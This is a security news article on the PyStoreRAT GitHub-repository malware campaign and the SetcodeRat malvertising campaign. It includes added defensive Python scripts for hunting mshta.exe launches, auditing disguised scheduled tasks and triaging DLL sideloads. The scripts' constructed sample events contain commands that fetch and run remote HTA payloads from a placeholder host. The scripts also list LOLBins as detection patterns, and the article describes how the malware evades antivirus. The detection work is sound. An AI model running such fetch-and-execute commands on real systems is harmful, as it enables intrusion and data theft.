Cybercriminals Use GitHub Repositories to Spread PyStoreRAT Malware, Evading Detection with Open Source Masquerades

Cybercriminals Exploit GitHub Repositories to Distribute PyStoreRAT Malware

Cybersecurity experts have recently uncovered a sophisticated campaign where malicious actors are leveraging GitHub-hosted Python repositories to disseminate a newly identified JavaScript-based Remote Access Trojan (RAT) named PyStoreRAT. These repositories, often presented as development utilities or Open Source Intelligence (OSINT) tools, contain minimal code designed to covertly download and execute a remote HTML Application (HTA) file via ‘mshta.exe’.

PyStoreRAT is characterized as a modular, multi-stage implant capable of executing various modules, including EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA. Notably, it also deploys an information stealer known as Rhadamanthys as a subsequent payload.

Attack Methodology:

The attackers distribute the malware through Python or JavaScript loader stubs embedded in GitHub repositories that masquerade as OSINT tools, decentralized finance (DeFi) bots, GPT wrappers, and security-themed utilities. These tools are specifically designed to attract analysts and developers.

The campaign traces back to mid-June 2025, with a continuous stream of such repositories being published since then. The perpetrators promote these tools via social media platforms like YouTube and X, and artificially inflate the repositories’ star and fork metrics—a tactic reminiscent of the Stargazers Ghost Network.

The threat actors utilize either newly created GitHub accounts or dormant ones to publish these repositories. They discreetly introduce the malicious payload through maintenance commits in October and November, after the tools have gained popularity and appeared on GitHub’s top trending lists.

Many of these tools do not function as advertised, often displaying static menus or non-interactive interfaces, while others perform minimal placeholder operations. The objective is to exploit GitHub’s inherent trust, deceiving users into executing the loader stub that initiates the infection chain.

Infection Chain:

Executing the loader stub triggers a remote HTA payload, which subsequently delivers the PyStoreRAT malware. This malware is equipped to profile the system, check for administrator privileges, and scan for cryptocurrency wallet-related files associated with applications like Ledger Live, Trezor, Exodus, Atomic, Guarda, and BitBox02.

The loader stub collects a list of installed antivirus products, searching for strings matching Falcon (CrowdStrike Falcon) or Reason (Cybereason or ReasonLabs), likely to evade detection. If these are detected, it launches mshta.exe via cmd.exe; otherwise, it proceeds with direct mshta.exe execution.
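The loader behaviour described above (a script interpreter spawning mshta.exe, either directly or through cmd.exe, with a remote HTA URL on the command line) is easy to express as a process-tree hunt. The following is an added detection example, not code from the original report or from the campaign; the events are constructed to mimic Sysmon-style process-creation records (pid, parent pid, image, command line) and the `example.invalid` host is a placeholder, not an indicator from the article.

```python
"""Hunt constructed process-creation events for mshta.exe launched from a script loader."""
import re
from typing import Dict, List

# Constructed sample events (not real telemetry), loosely modelled on Sysmon event ID 1 fields.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe",          "cmdline": "explorer.exe"},
    # Chain 1: python.exe -> cmd.exe -> mshta.exe with a remote HTA (the "AV detected" branch).
    {"pid": 200, "ppid": 100, "image": r"C:\Python312\python.exe",          "cmdline": "python.exe osint_tool.py"},
    {"pid": 210, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",      "cmdline": "cmd.exe /c mshta https://example.invalid/update.hta"},
    {"pid": 220, "ppid": 210, "image": r"C:\Windows\System32\mshta.exe",    "cmdline": "mshta https://example.invalid/update.hta"},
    # Chain 2: python.exe -> mshta.exe directly (the "no AV detected" branch).
    {"pid": 300, "ppid": 100, "image": r"C:\Python312\python.exe",          "cmdline": "python.exe defi_bot.py"},
    {"pid": 310, "ppid": 300, "image": r"C:\Windows\System32\mshta.exe",    "cmdline": "mshta.exe http://example.invalid/a.hta"},
    # Negative case: mshta.exe with a local file, launched from explorer.exe, outside this rule's scope.
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",    "cmdline": r"mshta.exe C:\Users\me\Documents\report.hta"},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\notepad.exe",  "cmdline": "notepad.exe"},
]

# Interpreters the loader stubs run under (Python or JavaScript per the report), plus common shells.
SCRIPT_INTERPRETERS = {"python.exe", "pythonw.exe", "node.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(event: Dict, by_pid: Dict[int, Dict], max_depth: int = 3) -> List[Dict]:
    """Walk the parent chain upward (nearest parent first), stopping at max_depth or an unknown pid."""
    chain, cur = [], event
    for _ in range(max_depth):
        parent = by_pid.get(cur["ppid"])
        if parent is None:
            break
        chain.append(parent)
        cur = parent
    return chain


def flag_mshta_events(events: List[Dict]) -> List[Dict]:
    """Return one finding per mshta.exe event that shows a remote HTA and/or a script-interpreter ancestor."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if basename(e["image"]) != "mshta.exe":
            continue
        reasons = []
        if URL_RE.search(e["cmdline"]):
            reasons.append("remote HTA URL on command line")
        chain = [basename(a["image"]) for a in ancestors(e, by_pid)]
        if len(chain) > 1 and chain[0] in SHELLS and chain[1] in SCRIPT_INTERPRETERS:
            reasons.append(f"launched via {chain[0]} from {chain[1]}")
        elif chain and chain[0] in SCRIPT_INTERPRETERS:
            reasons.append(f"launched directly from {chain[0]}")
        if reasons:
            findings.append({"pid": e["pid"], "cmdline": e["cmdline"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in flag_mshta_events(SAMPLE_EVENTS):
        print(f["pid"], f["cmdline"], "->", "; ".join(f["reasons"]))
```

Both branches the report describes are caught by the same rule because the parent walk looks one hop past cmd.exe; the local-file mshta launch from explorer.exe is deliberately left unflagged to show the rule's scope, and a production version would also want to match on the interpreter's working directory being a cloned repository.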

To maintain persistence, the malware sets up a scheduled task disguised as an NVIDIA app self-update. In its final stage, PyStoreRAT contacts an external server to fetch commands for execution on the host. The supported commands include:

– Downloading and executing EXE payloads, including Rhadamanthys.

– Downloading and extracting ZIP archives.

– Downloading a malicious DLL and executing it using rundll32.exe.

– Fetching raw JavaScript code and executing it dynamically in memory using eval().

– Downloading and installing MSI packages.

– Spawning a secondary mshta.exe process to load additional remote HTA payloads.

– Executing PowerShell commands directly in memory.

– Spreading via removable drives by replacing legitimate documents with malicious Windows Shortcut (LNK) files.

– Deleting the scheduled task to remove forensic evidence.
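The persistence mechanism above (a scheduled task posing as an NVIDIA app self-update) can be audited from exported task XML. The script below is an added example, not code from the report; the two task definitions are constructed, the vendor install path used as the "expected" location is an assumption for the sake of the check, and the URL host is a placeholder.

```python
"""Audit Windows Task Scheduler XML for vendor-named tasks whose action is a script host or remote payload."""
import re
import xml.etree.ElementTree as ET
from typing import List

# The Task Scheduler XML namespace used by exported task definitions.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# LOLBins that a vendor updater task has no business invoking.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe",
                "cmd.exe", "rundll32.exe", "regsvr32.exe"}
VENDOR_WORDS = ("nvidia",)
# Assumed install locations for the vendor's own binaries (an assumption for this example).
EXPECTED_VENDOR_DIRS = (r"c:\program files\nvidia corporation",
                        r"c:\program files (x86)\nvidia corporation")

# Constructed task that mimics the persistence described in the report.
SUSPICIOUS_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Description>NVIDIA App SelfUpdate</Description></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>mshta.exe</Command>
      <Arguments>https://example.invalid/nv/update.hta</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed task whose action points at the assumed vendor directory.
BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Description>NVIDIA App Update</Description></RegistrationInfo>
  <Actions Context="Author">
    <Exec>
      <Command>"C:\\Program Files\\NVIDIA Corporation\\NVIDIA App\\NVIDIA App.exe"</Command>
      <Arguments>--update</Arguments>
    </Exec>
  </Actions>
</Task>"""


def audit_task(task_name: str, task_xml: str) -> List[str]:
    """Return a list of reasons the task looks like masquerading persistence; empty means nothing found."""
    root = ET.fromstring(task_xml)
    description = root.findtext("t:RegistrationInfo/t:Description", default="", namespaces=NS)
    claims_vendor = any(w in f"{task_name} {description}".lower() for w in VENDOR_WORDS)
    reasons = []
    for action in root.findall("t:Actions/t:Exec", NS):
        command = action.findtext("t:Command", default="", namespaces=NS).strip().strip('"')
        arguments = action.findtext("t:Arguments", default="", namespaces=NS)
        exe = command.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if exe in SCRIPT_HOSTS:
            reasons.append(f"action runs script host {exe}")
        if re.search(r"https?://", arguments, re.IGNORECASE):
            reasons.append("action arguments contain a remote URL")
        if claims_vendor and not command.lower().startswith(EXPECTED_VENDOR_DIRS):
            reasons.append("vendor-named task but command is outside the vendor's install directory")
    return reasons


if __name__ == "__main__":
    for name, xml_text in (("NVIDIA App SelfUpdate", SUSPICIOUS_TASK), ("NVIDIA App Update", BENIGN_TASK)):
        print(name, "->", audit_task(name, xml_text) or ["no findings"])
```

On a live host the XML comes from `schtasks /query /xml` or the Task Scheduler library; feeding each exported task through `audit_task` with its registered name gives a quick sweep for the NVIDIA-themed task, and the vendor word list is the only part that needs extending for other lures.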

Attribution and Implications:

While the exact perpetrators remain unidentified, the presence of Russian-language artifacts and coding patterns suggests a threat actor of likely Eastern European origin.

PyStoreRAT signifies a shift toward modular, script-based implants that can adapt to security controls and deliver multiple payload formats. Its use of HTA/JavaScript for execution, Python loaders for delivery, and Falcon-aware evasion logic creates a stealthy initial foothold that traditional Endpoint Detection and Response (EDR) solutions may detect only late in the infection chain.

Broader Context:

This disclosure coincides with reports from Chinese security vendor QiAnXin detailing another new remote access trojan (RAT) named SetcodeRat. Since October 2025, SetcodeRat has likely been propagated across China via malvertising lures, infecting hundreds of computers, including those belonging to governments and enterprises, within a month.

The malware masquerades as legitimate installers for popular programs like Google Chrome and proceeds to the next stage only if the system language corresponds to regions such as Mainland China, Hong Kong, Macao, and Taiwan. It also terminates execution if a connection to a specific Bilibili URL is unsuccessful.

In the subsequent stage, an executable named pnm2png.exe is launched to sideload zlib1.dll, which then decrypts and runs the contents of a file called qt.conf. The decrypted payload is a DLL embedding the RAT payload. SetcodeRat can connect to Telegram or a conventional command-and-control (C2) server to retrieve instructions and execute data theft.
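The SetcodeRat stage above pairs a DLL sideload (an EXE loading zlib1.dll from its own directory) with a config-named file that is really an encrypted payload. A triage check for that pattern, added here as an example rather than taken from QiAnXin's report, is to flag EXE/DLL co-location in user-writable directories and to measure byte entropy of config-looking files. The file contents below are constructed placeholders (the "encrypted" sample is chained SHA-256 output so the example is reproducible), and the directory paths are assumptions.

```python
"""Triage a constructed file drop for the sideload-plus-encrypted-config pattern."""
import hashlib
import math
from collections import Counter
from typing import Dict, List

# Directories where vendor binaries legitimately sit beside their own DLLs.
PROTECTED_DIRS = (r"c:\windows\system32", r"c:\program files", r"c:\program files (x86)")
CONFIG_EXTS = (".conf", ".ini", ".dat", ".txt", ".xml")
ENTROPY_THRESHOLD = 7.0  # bits per byte; plaintext configuration rarely exceeds ~5


def deterministic_noise(n_blocks: int = 128) -> bytes:
    """Constructed stand-in for encrypted payload bytes: 128 chained SHA-256 digests (4096 bytes)."""
    return b"".join(hashlib.sha256(bytes([i])).digest() for i in range(n_blocks))


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; 8.0 is the maximum for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def triage_drop(directory: str, files: Dict[str, bytes]) -> List[str]:
    """Return reasons a directory listing (name -> content) looks like a sideload staging drop."""
    reasons = []
    user_writable = not directory.lower().startswith(PROTECTED_DIRS)
    lowered = {name.lower(): name for name in files}
    exes = [n for n in lowered if n.endswith(".exe")]
    dlls = [n for n in lowered if n.endswith(".dll")]
    if user_writable and exes and dlls:
        reasons.append(f"{', '.join(exes)} sits beside {', '.join(dlls)} in a user-writable directory: "
                       "DLL search-order sideload candidate")
    for name in lowered:
        if name.endswith(CONFIG_EXTS):
            h = shannon_entropy(files[lowered[name]])
            if h > ENTROPY_THRESHOLD:
                reasons.append(f"{name} has entropy {h:.2f} bits/byte: config-named file likely holds an encrypted payload")
    return reasons


# Constructed drop mirroring the names in the report; the PE bodies are placeholders, not real binaries.
SUSPICIOUS_DROP = {
    "pnm2png.exe": b"MZ" + b"\x00" * 64,
    "zlib1.dll": b"MZ" + b"\x00" * 64,
    "qt.conf": deterministic_noise(),
}
# Constructed benign layout: same file names, but a plaintext Qt config under Program Files.
BENIGN_DROP = {
    "viewer.exe": b"MZ" + b"\x00" * 64,
    "zlib1.dll": b"MZ" + b"\x00" * 64,
    "qt.conf": b"[Paths]\nPlugins = plugins\n",
}


if __name__ == "__main__":
    print(triage_drop(r"C:\Users\victim\AppData\Local\Temp\ChromeSetup", SUSPICIOUS_DROP))
    print(triage_drop(r"C:\Program Files\Viewer", BENIGN_DROP))
```

Entropy alone does not prove encryption (compressed images score high too), which is why the check only weighs it for files whose names promise plaintext; combined with the co-location rule it separates the staged drop from a legitimate Qt application that ships the same zlib1.dll and qt.conf names.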

The malware enables actions such as taking screenshots, logging keystrokes, reading and setting folders, starting processes, running cmd.exe, setting socket connections, collecting system and network information, and updating itself to a new version.

Conclusion:

The emergence of PyStoreRAT and SetcodeRat underscores the evolving tactics of cybercriminals who exploit trusted platforms and tools to distribute sophisticated malware. These developments highlight the critical need for heightened vigilance and robust security measures to protect against such insidious threats.